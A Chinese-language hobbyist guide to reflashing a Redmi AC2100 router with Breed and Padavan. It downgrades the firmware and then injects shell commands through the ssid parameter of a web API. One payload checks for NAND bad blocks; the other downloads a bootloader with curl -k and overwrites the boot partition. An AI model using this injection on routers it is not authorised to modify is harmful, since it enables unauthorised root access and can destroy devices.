红米 AC2100 刷机记录
准备
过程
先把原厂固件降级成带有漏洞的版本。
进入后台(
192.168.31.1)- 设置 - 系统状态 - 手动升级 - 加载固件 - 保留数据(可选) - 升级。升级完成后,在地址栏里找到
stok=xxx字段,复制并替换下面代码中的C部分。1
http://192.168.31.1/cgi-bin/luci/;stok=CCCCCCCCCCC/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0A%5B%20-z%20%22%24(dmesg%20%7C%20grep%20ESMT)%22%20%5D%20%26%26%20B%3D%22Toshiba%22%20%7C%7C%20B%3D%22ESMT%22%0Auci%20set%20wireless.%24(uci%20show%20wireless%20%7C%20awk%20-F%20'.'%20'%2Fwl1%2F%20%7Bprint%20%242%7D').ssid%3D%22%24B%20%24(dmesg%20%7C%20awk%20'%2FBad%2F%20%7Bprint%20%245%7D')%22%0A%2Fetc%2Finit.d%2Fnetwork%20restart%0A
1
2
3# 检测 NAND 坏块代码
[ -z "$(dmesg | grep ESMT)" ] && B="Toshiba" || B="ESMT"
uci set wireless.$(uci show wireless | awk -F '.' '/wl1/ {print $2}').ssid="$B $(dmesg | awk '/Bad/ {print $5}')"复制修改好
stok的代码,粘贴到浏览器,回车。浏览器会显示 :
{"code":0}。此代码是用来检查 NAND 坏块的。路由器开机超过一小时建议先重启。运行代码后,你路由器的 2.4g WiFi 名称会改名成:比如 “ESMT”,“Toshiba”,“Toshiba 90 768”。 90 和 768 是坏块。 如果 ESMT 或者 Toshiba 后面没数字,则没有坏块。
接着刷 Breed。 还是复制
stok代码,并替换下面代码中的C部分。1
http://192.168.31.1/cgi-bin/luci/;stok=CCCCCCCCCCC/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Acd%20%2Ftmp%0Acurl%20-o%20B%20-O%20https%3A%2F%2Fbreed.hackpascal.net%2Fbreed-mt7621-xiaomi-r3g.bin%20-k%0A%5B%20-z%20%22%24(sha256sum%20B%20%7C%20grep%20242d42eb5f5aaa67ddc9c1baf1acdf58d289e3f792adfdd77b589b9dc71eff85)%22%20%5D%20%7C%7C%20mtd%20-r%20write%20B%20Bootloader%0A
1
2
3
4# 刷 Breed 代码
cd /tmp
curl -o B -O https://breed.hackpascal.net/breed-mt7621-xiaomi-r3g.bin -k
[ -z "$(sha256sum B | grep 242d42eb5f5aaa67ddc9c1baf1acdf58d289e3f792adfdd77b589b9dc71eff85)" ] || mtd -r write B Bootloader复制修改好的代码到浏览器中并回车。
如果路由器在 60 秒内重启则代表刷 Breed 成功(灯会从蓝变橘,最终变蓝进入系统)。成功后拔掉电源,按住
reset同时接上电源等 10 秒即可进入 Breed(192.168.1.1)。
如果没重启,可能是stok过期了,进入后台复制新的stok即可;也有可能下载的 Breed 损坏,重新运行代码;也有可能是因为没网络。在 Breed 控制台选择固件更新 - 第二栏的固件 - 上传 Padavan 固件即可。
路由器后台(
192.168.123.1),账号密码默认都为admin,wifi 密码默认1234567890